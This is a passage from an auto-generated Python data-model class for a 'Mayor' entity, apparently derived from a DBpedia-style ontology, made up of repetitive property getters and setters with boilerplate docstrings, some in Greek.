:param active_years_start_year_mgr: The active_years_start_year_mgr of this Mayor. # noqa: E501
:type: list[str]
"""
self._active_years_start_year_mgr = active_years_start_year_mgr
@property
def wedding_parents_date(self):
"""Gets the wedding_parents_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The wedding_parents_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._wedding_parents_date
@wedding_parents_date.setter
def wedding_parents_date(self, wedding_parents_date):
"""Sets the wedding_parents_date of this Mayor.
Description not available # noqa: E501
:param wedding_parents_date: The wedding_parents_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._wedding_parents_date = wedding_parents_date
@property
def birth_place(self):
"""Gets the birth_place of this Mayor. # noqa: E501
where the person was born # noqa: E501
:return: The birth_place of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._birth_place
@birth_place.setter
def birth_place(self, birth_place):
"""Sets the birth_place of this Mayor.
where the person was born # noqa: E501
:param birth_place: The birth_place of this Mayor. # noqa: E501
:type: list[object]
"""
self._birth_place = birth_place
@property
def world(self):
"""Gets the world of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The world of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._world
@world.setter
def world(self, world):
"""Sets the world of this Mayor.
Description not available # noqa: E501
:param world: The world of this Mayor. # noqa: E501
:type: list[object]
"""
self._world = world
@property
def astrological_sign(self):
"""Gets the astrological_sign of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The astrological_sign of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._astrological_sign
@astrological_sign.setter
def astrological_sign(self, astrological_sign):
"""Sets the astrological_sign of this Mayor.
Description not available # noqa: E501
:param astrological_sign: The astrological_sign of this Mayor. # noqa: E501
:type: list[object]
"""
self._astrological_sign = astrological_sign
@property
def eye_color(self):
"""Gets the eye_color of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The eye_color of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._eye_color
@eye_color.setter
def eye_color(self, eye_color):
"""Sets the eye_color of this Mayor.
Description not available # noqa: E501
:param eye_color: The eye_color of this Mayor. # noqa: E501
:type: list[object]
"""
self._eye_color = eye_color
@property
def networth(self):
"""Gets the networth of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The networth of this Mayor. # noqa: E501
:rtype: list[float]
"""
return self._networth
@networth.setter
def networth(self, networth):
"""Sets the networth of this Mayor.
Description not available # noqa: E501
:param networth: The networth of this Mayor. # noqa: E501
:type: list[float]
"""
self._networth = networth
@property
def coalition(self):
"""Gets the coalition of this Mayor. # noqa: E501
Παλαιότερα ο συνασπισμός χρησιμοποιούνταν ως στρατιωτικός όρος που υποδήλωνε την όμορη παράταξη πολεμιστών κατά την οποία ο κάθε στρατιώτης προφύλασσε τον διπλανό του με την ασπίδα του. # noqa: E501
:return: The coalition of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._coalition
@coalition.setter
def coalition(self, coalition):
"""Sets the coalition of this Mayor.
Παλαιότερα ο συνασπισμός χρησιμοποιούνταν ως στρατιωτικός όρος που υποδήλωνε την όμορη παράταξη πολεμιστών κατά την οποία ο κάθε στρατιώτης προφύλασσε τον διπλανό του με την ασπίδα του. # noqa: E501
:param coalition: The coalition of this Mayor. # noqa: E501
:type: list[str]
"""
self._coalition = coalition
@property
def national_team_match_point(self):
"""Gets the national_team_match_point of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The national_team_match_point of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._national_team_match_point
@national_team_match_point.setter
def national_team_match_point(self, national_team_match_point):
"""Sets the national_team_match_point of this Mayor.
Description not available # noqa: E501
:param national_team_match_point: The national_team_match_point of this Mayor. # noqa: E501
:type: list[str]
"""
self._national_team_match_point = national_team_match_point
@property
def national_selection(self):
"""Gets the national_selection of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The national_selection of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._national_selection
@national_selection.setter
def national_selection(self, national_selection):
"""Sets the national_selection of this Mayor.
Description not available # noqa: E501
:param national_selection: The national_selection of this Mayor. # noqa: E501
:type: list[object]
"""
self._national_selection = national_selection
@property
def agency(self):
"""Gets the agency of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The agency of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._agency
@agency.setter
def agency(self, agency):
"""Sets the agency of this Mayor.
Description not available # noqa: E501
:param agency: The agency of this Mayor. # noqa: E501
:type: list[object]
"""
self._agency = agency
@property
def start_wqs(self):
"""Gets the start_wqs of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The start_wqs of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._start_wqs
@start_wqs.setter
def start_wqs(self, start_wqs):
"""Sets the start_wqs of this Mayor.
Description not available # noqa: E501
:param start_wqs: The start_wqs of this Mayor. # noqa: E501
:type: list[str]
"""
self._start_wqs = start_wqs
@property
def defeat_as_mgr(self):
"""Gets the defeat_as_mgr of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The defeat_as_mgr of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._defeat_as_mgr
@defeat_as_mgr.setter
def defeat_as_mgr(self, defeat_as_mgr):
"""Sets the defeat_as_mgr of this Mayor.
Description not available # noqa: E501
:param defeat_as_mgr: The defeat_as_mgr of this Mayor. # noqa: E501
:type: list[int]
"""
self._defeat_as_mgr = defeat_as_mgr
@property
def death_year(self):
"""Gets the death_year of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The death_year of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._death_year
@death_year.setter
def death_year(self, death_year):
"""Sets the death_year of this Mayor.
Description not available # noqa: E501
:param death_year: The death_year of this Mayor. # noqa: E501
:type: list[str]
"""
self._death_year = death_year
@property
def world_tournament_gold(self):
"""Gets the world_tournament_gold of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The world_tournament_gold of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._world_tournament_gold
@world_tournament_gold.setter
def world_tournament_gold(self, world_tournament_gold):
"""Sets the world_tournament_gold of this Mayor.
Description not available # noqa: E501
:param world_tournament_gold: The world_tournament_gold of this Mayor. # noqa: E501
:type: list[int]
"""
self._world_tournament_gold = world_tournament_gold
@property
def pga_wins(self):
"""Gets the pga_wins of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The pga_wins of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._pga_wins
@pga_wins.setter
def pga_wins(self, pga_wins):
"""Sets the pga_wins of this Mayor.
Description not available # noqa: E501
:param pga_wins: The pga_wins of this Mayor. # noqa: E501
:type: list[object]
"""
self._pga_wins = pga_wins
@property
def board(self):
"""Gets the board of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The board of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._board
@board.setter
def board(self, board):
"""Sets the board of this Mayor.
Description not available # noqa: E501
:param board: The board of this Mayor. # noqa: E501
:type: list[object]
"""
self._board = board
@property
def rid_id(self):
"""Gets the rid_id of this Mayor. # noqa: E501
An identifying system for scientific authors. The system was introduced in January 2008 by Thomson Reuters. The combined use of the Digital Object Identifier with the ResearcherID allows for a unique association of authors and scientific articles. # noqa: E501
:return: The rid_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._rid_id
@rid_id.setter
def rid_id(self, rid_id):
"""Sets the rid_id of this Mayor.
An identifying system for scientific authors. The system was introduced in January 2008 by Thomson Reuters. The combined use of the Digital Object Identifier with the ResearcherID allows for a unique association of authors and scientific articles. # noqa: E501
:param rid_id: The rid_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._rid_id = rid_id
@property
def dead_in_fight_date(self):
"""Gets the dead_in_fight_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The dead_in_fight_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._dead_in_fight_date
@dead_in_fight_date.setter
def dead_in_fight_date(self, dead_in_fight_date):
"""Sets the dead_in_fight_date of this Mayor.
Description not available # noqa: E501
:param dead_in_fight_date: The dead_in_fight_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._dead_in_fight_date = dead_in_fight_date
@property
def related_functions(self):
"""Gets the related_functions of this Mayor. # noqa: E501
This property is to accommodate the list field that contains a list of related personFunctions a person holds or has held # noqa: E501
:return: The related_functions of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._related_functions
@related_functions.setter
def related_functions(self, related_functions):
"""Sets the related_functions of this Mayor.
This property is to accommodate the list field that contains a list of related personFunctions a person holds or has held # noqa: E501
:param related_functions: The related_functions of this Mayor. # noqa: E501
:type: list[object]
"""
self._related_functions = related_functions
@property
def manager_season(self):
"""Gets the manager_season of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The manager_season of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._manager_season
@manager_season.setter
def manager_season(self, manager_season):
"""Sets the manager_season of this Mayor.
Description not available # noqa: E501
:param manager_season: The manager_season of this Mayor. # noqa: E501
:type: list[object]
"""
self._manager_season = manager_season
@property
def reign(self):
"""Gets the reign of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The reign of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._reign
@reign.setter
def reign(self, reign):
"""Sets the reign of this Mayor.
Description not available # noqa: E501
:param reign: The reign of this Mayor. # noqa: E501
:type: list[str]
"""
self._reign = reign
@property
def second(self):
"""Gets the second of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The second of this Mayor. # noqa: E501
:rtype: list[int]
"""
return self._second
@second.setter
def second(self, second):
"""Sets the second of this Mayor.
Description not available # noqa: E501
:param second: The second of this Mayor. # noqa: E501
:type: list[int]
"""
self._second = second
@property
def radio(self):
"""Gets the radio of this Mayor. # noqa: E501
To ραδιόφωνο είναι η συσκευή που λειτουργεί ως \"ραδιοδέκτης - μετατροπέας\" όπου λαμβάνοντας τις ραδιοφωνικές εκπομπές των ραδιοφωνικών σταθμών τις μετατρέπει σε ήχο. # noqa: E501
:return: The radio of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._radio
@radio.setter
def radio(self, radio):
"""Sets the radio of this Mayor.
To ραδιόφωνο είναι η συσκευή που λειτουργεί ως \"ραδιοδέκτης - μετατροπέας\" όπου λαμβάνοντας τις ραδιοφωνικές εκπομπές των ραδιοφωνικών σταθμών τις μετατρέπει σε ήχο. # noqa: E501
:param radio: The radio of this Mayor. # noqa: E501
:type: list[object]
"""
self._radio = radio
@property
def full_competition(self):
"""Gets the full_competition of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The full_competition of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._full_competition
@full_competition.setter
def full_competition(self, full_competition):
"""Sets the full_competition of this Mayor.
Description not available # noqa: E501
:param full_competition: The full_competition of this Mayor. # noqa: E501
:type: list[str]
"""
self._full_competition = full_competition
@property
def free_score_competition(self):
"""Gets the free_score_competition of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The free_score_competition of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._free_score_competition
@free_score_competition.setter
def free_score_competition(self, free_score_competition):
"""Sets the free_score_competition of this Mayor.
Description not available # noqa: E501
:param free_score_competition: The free_score_competition of this Mayor. # noqa: E501
:type: list[str]
"""
self._free_score_competition = free_score_competition
@property
def prefect(self):
"""Gets the prefect of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The prefect of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._prefect
@prefect.setter
def prefect(self, prefect):
"""Sets the prefect of this Mayor.
Description not available # noqa: E501
:param prefect: The prefect of this Mayor. # noqa: E501
:type: list[object]
"""
self._prefect = prefect
@property
def publication(self):
"""Gets the publication of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The publication of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._publication
@publication.setter
def publication(self, publication):
"""Sets the publication of this Mayor.
Description not available # noqa: E501
:param publication: The publication of this Mayor. # noqa: E501
:type: list[str]
"""
self._publication = publication
@property
def opponent(self):
"""Gets the opponent of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The opponent of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._opponent
@opponent.setter
def opponent(self, opponent):
"""Sets the opponent of this Mayor.
Description not available # noqa: E501
:param opponent: The opponent of this Mayor. # noqa: E501
:type: list[object]
"""
self._opponent = opponent
@property
def employer(self):
"""Gets the employer of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The employer of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._employer
@employer.setter
def employer(self, employer):
"""Sets the employer of this Mayor.
Description not available # noqa: E501
:param employer: The employer of this Mayor. # noqa: E501
:type: list[object]
"""
self._employer = employer
@property
def affair(self):
"""Gets the affair of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The affair of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._affair
@affair.setter
def affair(self, affair):
"""Sets the affair of this Mayor.
Description not available # noqa: E501
:param affair: The affair of this Mayor. # noqa: E501
:type: list[str]
"""
self._affair = affair
@property
def body_discovered(self):
"""Gets the body_discovered of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The body_discovered of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._body_discovered
@body_discovered.setter
def body_discovered(self, body_discovered):
"""Sets the body_discovered of this Mayor.
Description not available # noqa: E501
:param body_discovered: The body_discovered of this Mayor. # noqa: E501
:type: list[object]
"""
self._body_discovered = body_discovered
@property
def buried_place(self):
"""Gets the buried_place of this Mayor. # noqa: E501
The place where the person has been buried. # noqa: E501
:return: The buried_place of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._buried_place
@buried_place.setter
def buried_place(self, buried_place):
"""Sets the buried_place of this Mayor.
The place where the person has been buried. # noqa: E501
:param buried_place: The buried_place of this Mayor. # noqa: E501
:type: list[object]
"""
self._buried_place = buried_place
@property
def residence(self):
"""Gets the residence of this Mayor. # noqa: E501
Place of residence of a person. # noqa: E501
:return: The residence of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._residence
@residence.setter
def residence(self, residence):
"""Sets the residence of this Mayor.
Place of residence of a person. # noqa: E501
:param residence: The residence of this Mayor. # noqa: E501
:type: list[object]
"""
self._residence = residence
@property
def usurper(self):
"""Gets the usurper of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The usurper of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._usurper
@usurper.setter
def usurper(self, usurper):
"""Sets the usurper of this Mayor.
Description not available # noqa: E501
:param usurper: The usurper of this Mayor. # noqa: E501
:type: list[object]
"""
self._usurper = usurper
@property
def other_occupation(self):
"""Gets the other_occupation of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The other_occupation of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._other_occupation
@other_occupation.setter
def other_occupation(self, other_occupation):
"""Sets the other_occupation of this Mayor.
Description not available # noqa: E501
:param other_occupation: The other_occupation of this Mayor. # noqa: E501
:type: list[object]
"""
self._other_occupation = other_occupation
@property
def contest(self):
"""Gets the contest of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The contest of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._contest
@contest.setter
def contest(self, contest):
"""Sets the contest of this Mayor.
Description not available # noqa: E501
:param contest: The contest of this Mayor. # noqa: E501
:type: list[object]
"""
self._contest = contest
@property
def active_years_end_date_mgr(self):
"""Gets the active_years_end_date_mgr of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The active_years_end_date_mgr of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._active_years_end_date_mgr
@active_years_end_date_mgr.setter
def active_years_end_date_mgr(self, active_years_end_date_mgr):
"""Sets the active_years_end_date_mgr of this Mayor.
Description not available # noqa: E501
:param active_years_end_date_mgr: The active_years_end_date_mgr of this Mayor. # noqa: E501
:type: list[str]
"""
self._active_years_end_date_mgr = active_years_end_date_mgr
@property
def created(self):
"""Gets the created of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The created of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._created
@created.setter
def created(self, created):
"""Sets the created of this Mayor.
Description not available # noqa: E501
:param created: The created of this Mayor. # noqa: E501
:type: list[object]
"""
self._created = created
@property
def original_danse_score(self):
"""Gets the original_danse_score of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The original_danse_score of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._original_danse_score
@original_danse_score.setter
def original_danse_score(self, original_danse_score):
"""Sets the original_danse_score of this Mayor.
Description not available # noqa: E501
:param original_danse_score: The original_danse_score of this Mayor. # noqa: E501
:type: list[str]
"""
self._original_danse_score = original_danse_score
@property
def end_career(self):
"""Gets the end_career of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The end_career of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._end_career
@end_career.setter
def end_career(self, end_career):
"""Sets the end_career of this Mayor.
Description not available # noqa: E501
:param end_career: The end_career of this Mayor. # noqa: E501
:type: list[str]
"""
self._end_career = end_career
@property
def note_on_resting_place(self):
"""Gets the note_on_resting_place of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The note_on_resting_place of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._note_on_resting_place
@note_on_resting_place.setter
def note_on_resting_place(self, note_on_resting_place):
"""Sets the note_on_resting_place of this Mayor.
Description not available # noqa: E501
:param note_on_resting_place: The note_on_resting_place of this Mayor. # noqa: E501
:type: list[str]
"""
self._note_on_resting_place = note_on_resting_place
@property
def army(self):
"""Gets the army of this Mayor. # noqa: E501
Ένας στρατός αποτελεί τις επίγειες ένοπλες δυνάμεις ενός έθνους # noqa: E501
:return: The army of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._army
@army.setter
def army(self, army):
"""Sets the army of this Mayor.
Ένας στρατός αποτελεί τις επίγειες ένοπλες δυνάμεις ενός έθνους # noqa: E501
:param army: The army of this Mayor. # noqa: E501
:type: list[str]
"""
self._army = army
@property
def active_year(self):
"""Gets the active_year of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The active_year of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._active_year
@active_year.setter
def active_year(self, active_year):
"""Sets the active_year of this Mayor.
Description not available # noqa: E501
:param active_year: The active_year of this Mayor. # noqa: E501
:type: list[str]
"""
self._active_year = active_year
@property
def person_function(self):
"""Gets the person_function of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The person_function of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._person_function
@person_function.setter
def person_function(self, person_function):
"""Sets the person_function of this Mayor.
Description not available # noqa: E501
:param person_function: The person_function of this Mayor. # noqa: E501
:type: list[object]
"""
self._person_function = person_function
@property
def pro_since(self):
"""Gets the pro_since of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The pro_since of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._pro_since
@pro_since.setter
def pro_since(self, pro_since):
"""Sets the pro_since of this Mayor.
Description not available # noqa: E501
:param pro_since: The pro_since of this Mayor. # noqa: E501
:type: list[str]
"""
self._pro_since = pro_since
@property
def cause_of_death(self):
"""Gets the cause_of_death of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The cause_of_death of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._cause_of_death
@cause_of_death.setter
def cause_of_death(self, cause_of_death):
"""Sets the cause_of_death of this Mayor.
Description not available # noqa: E501
:param cause_of_death: The cause_of_death of this Mayor. # noqa: E501
:type: list[str]
"""
self._cause_of_death = cause_of_death
@property
def dubber(self):
"""Gets the dubber of this Mayor. # noqa: E501
the person who dubs another person e.g. an actor or a fictional character in movies # noqa: E501
:return: The dubber of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._dubber
@dubber.setter
def dubber(self, dubber):
"""Sets the dubber of this Mayor.
the person who dubs another person e.g. an actor or a fictional character in movies # noqa: E501
:param dubber: The dubber of this Mayor. # noqa: E501
:type: list[object]
"""
self._dubber = dubber
@property
def non_professional_career(self):
"""Gets the non_professional_career of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The non_professional_career of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._non_professional_career
@non_professional_career.setter
def non_professional_career(self, non_professional_career):
"""Sets the non_professional_career of this Mayor.
Description not available # noqa: E501
:param non_professional_career: The non_professional_career of this Mayor. # noqa: E501
:type: list[str]
"""
self._non_professional_career = non_professional_career
@property
def military_function(self):
"""Gets the military_function of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The military_function of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._military_function
@military_function.setter
def military_function(self, military_function):
"""Sets the military_function of this Mayor.
Description not available # noqa: E501
:param military_function: The military_function of this Mayor. # noqa: E501
:type: list[str]
"""
self._military_function = military_function
@property
def patent(self):
"""Gets the patent of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The patent of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._patent
@patent.setter
def patent(self, patent):
"""Sets the patent of this Mayor.
Description not available # noqa: E501
:param patent: The patent of this Mayor. # noqa: E501
:type: list[object]
"""
self._patent = patent
@property
def creation_christian_bishop(self):
"""Gets the creation_christian_bishop of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The creation_christian_bishop of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._creation_christian_bishop
@creation_christian_bishop.setter
def creation_christian_bishop(self, creation_christian_bishop):
"""Sets the creation_christian_bishop of this Mayor.
Description not available # noqa: E501
:param creation_christian_bishop: The creation_christian_bishop of this Mayor. # noqa: E501
:type: list[str]
"""
self._creation_christian_bishop = creation_christian_bishop
@property
def piercing(self):
"""Gets the piercing of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The piercing of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._piercing
@piercing.setter
def piercing(self, piercing):
"""Sets the piercing of this Mayor.
Description not available # noqa: E501
:param piercing: The piercing of this Mayor. # noqa: E501
:type: list[str]
"""
self._piercing = piercing
@property
def student(self):
"""Gets the student of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The student of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._student
@student.setter
def student(self, student):
"""Sets the student of this Mayor.
Description not available # noqa: E501
:param student: The student of this Mayor. # noqa: E501
:type: list[object]
"""
self._student = student
@property
def bad_guy(self):
"""Gets the bad_guy of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The bad_guy of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._bad_guy
@bad_guy.setter
def bad_guy(self, bad_guy):
"""Sets the bad_guy of this Mayor.
Description not available # noqa: E501
:param bad_guy: The bad_guy of this Mayor. # noqa: E501
:type: list[str]
"""
self._bad_guy = bad_guy
@property
def influenced(self):
"""Gets the influenced of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The influenced of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._influenced
@influenced.setter
def influenced(self, influenced):
"""Sets the influenced of this Mayor.
Description not available # noqa: E501
:param influenced: The influenced of this Mayor. # noqa: E501
:type: list[object]
"""
self._influenced = influenced
@property
def start_reign(self):
"""Gets the start_reign of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The start_reign of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._start_reign
@start_reign.setter
def start_reign(self, start_reign):
"""Sets the start_reign of this Mayor.
Description not available # noqa: E501
:param start_reign: The start_reign of this Mayor. # noqa: E501
:type: list[object]
"""
self._start_reign = start_reign
@property
def university(self):
"""Gets the university of this Mayor. # noqa: E501
university a person goes or went to. # noqa: E501
:return: The university of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._university
@university.setter
def university(self, university):
"""Sets the university of this Mayor.
university a person goes or went to. # noqa: E501
:param university: The university of this Mayor. # noqa: E501
:type: list[object]
"""
self._university = university
@property
def gym_apparatus(self):
"""Gets the gym_apparatus of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The gym_apparatus of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._gym_apparatus
@gym_apparatus.setter
def gym_apparatus(self, gym_apparatus):
"""Sets the gym_apparatus of this Mayor.
Description not available # noqa: E501
:param gym_apparatus: The gym_apparatus of this Mayor. # noqa: E501
:type: list[object]
"""
self._gym_apparatus = gym_apparatus
@property
def ideology(self):
"""Gets the ideology of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The ideology of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._ideology
@ideology.setter
def ideology(self, ideology):
"""Sets the ideology of this Mayor.
Description not available # noqa: E501
:param ideology: The ideology of this Mayor. # noqa: E501
:type: list[object]
"""
self._ideology = ideology
@property
def conviction_date(self):
"""Gets the conviction_date of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The conviction_date of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._conviction_date
@conviction_date.setter
def conviction_date(self, conviction_date):
"""Sets the conviction_date of this Mayor.
Description not available # noqa: E501
:param conviction_date: The conviction_date of this Mayor. # noqa: E501
:type: list[str]
"""
self._conviction_date = conviction_date
@property
def media(self):
"""Gets the media of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The media of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._media
@media.setter
def media(self, media):
"""Sets the media of this Mayor.
Description not available # noqa: E501
:param media: The media of this Mayor. # noqa: E501
:type: list[object]
"""
self._media = media
@property
def bnf_id(self):
"""Gets the bnf_id of this Mayor. # noqa: E501
Authority data of people listed in the general catalogue of the National Library of France # noqa: E501
:return: The bnf_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._bnf_id
@bnf_id.setter
def bnf_id(self, bnf_id):
"""Sets the bnf_id of this Mayor.
Authority data of people listed in the general catalogue of the National Library of France # noqa: E501
:param bnf_id: The bnf_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._bnf_id = bnf_id
@property
def pseudonym(self):
"""Gets the pseudonym of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The pseudonym of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._pseudonym
@pseudonym.setter
def pseudonym(self, pseudonym):
"""Sets the pseudonym of this Mayor.
Description not available # noqa: E501
:param pseudonym: The pseudonym of this Mayor. # noqa: E501
:type: list[str]
"""
self._pseudonym = pseudonym
@property
def temple_year(self):
"""Gets the temple_year of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The temple_year of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._temple_year
@temple_year.setter
def temple_year(self, temple_year):
"""Sets the temple_year of this Mayor.
Description not available # noqa: E501
:param temple_year: The temple_year of this Mayor. # noqa: E501
:type: list[str]
"""
self._temple_year = temple_year
@property
def clothing_size(self):
"""Gets the clothing_size of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The clothing_size of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._clothing_size
@clothing_size.setter
def clothing_size(self, clothing_size):
"""Sets the clothing_size of this Mayor.
Description not available # noqa: E501
:param clothing_size: The clothing_size of this Mayor. # noqa: E501
:type: list[str]
"""
self._clothing_size = clothing_size
@property
def speciality(self):
"""Gets the speciality of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The speciality of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._speciality
@speciality.setter
def speciality(self, speciality):
"""Sets the speciality of this Mayor.
Description not available # noqa: E501
:param speciality: The speciality of this Mayor. # noqa: E501
:type: list[str]
"""
self._speciality = speciality
@property
def award(self):
"""Gets the award of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The award of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._award
@award.setter
def award(self, award):
"""Sets the award of this Mayor.
Description not available # noqa: E501
:param award: The award of this Mayor. # noqa: E501
:type: list[object]
"""
self._award = award
@property
def kind_of_criminal_action(self):
"""Gets the kind_of_criminal_action of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The kind_of_criminal_action of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._kind_of_criminal_action
@kind_of_criminal_action.setter
def kind_of_criminal_action(self, kind_of_criminal_action):
"""Sets the kind_of_criminal_action of this Mayor.
Description not available # noqa: E501
:param kind_of_criminal_action: The kind_of_criminal_action of this Mayor. # noqa: E501
:type: list[str]
"""
self._kind_of_criminal_action = kind_of_criminal_action
@property
def isni_id(self):
"""Gets the isni_id of this Mayor. # noqa: E501
ISNI is a method for uniquely identifying the public identities of contributors to media content such as books, TV programmes, and newspaper articles. # noqa: E501
:return: The isni_id of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._isni_id
@isni_id.setter
def isni_id(self, isni_id):
"""Sets the isni_id of this Mayor.
ISNI is a method for uniquely identifying the public identities of contributors to media content such as books, TV programmes, and newspaper articles. # noqa: E501
:param isni_id: The isni_id of this Mayor. # noqa: E501
:type: list[str]
"""
self._isni_id = isni_id
@property
def significant_project(self):
"""Gets the significant_project of this Mayor. # noqa: E501
A siginificant artifact constructed by the person. # noqa: E501
:return: The significant_project of this Mayor. # noqa: E501
:rtype: list[object]
"""
return self._significant_project
@significant_project.setter
def significant_project(self, significant_project):
"""Sets the significant_project of this Mayor.
A siginificant artifact constructed by the person. # noqa: E501
:param significant_project: The significant_project of this Mayor. # noqa: E501
:type: list[object]
"""
self._significant_project = significant_project
@property
def leadership(self):
"""Gets the leadership of this Mayor. # noqa: E501
Description not available # noqa: E501
:return: The leadership of this Mayor. # noqa: E501
:rtype: list[str]
"""
return self._leadership
@leadership.setter
def leadership(self, leadership):
"""Sets the leadership of this Mayor.
Description not available # noqa: E501
:param leadership: The leadership of this Mayor. # noqa: E501
:type: list[str]
"""
self._leadership = leadership
@property
def death_date(self):
"""Gets the death_date of this Mayor. # noqa: E501
Description not available # noqa: E501
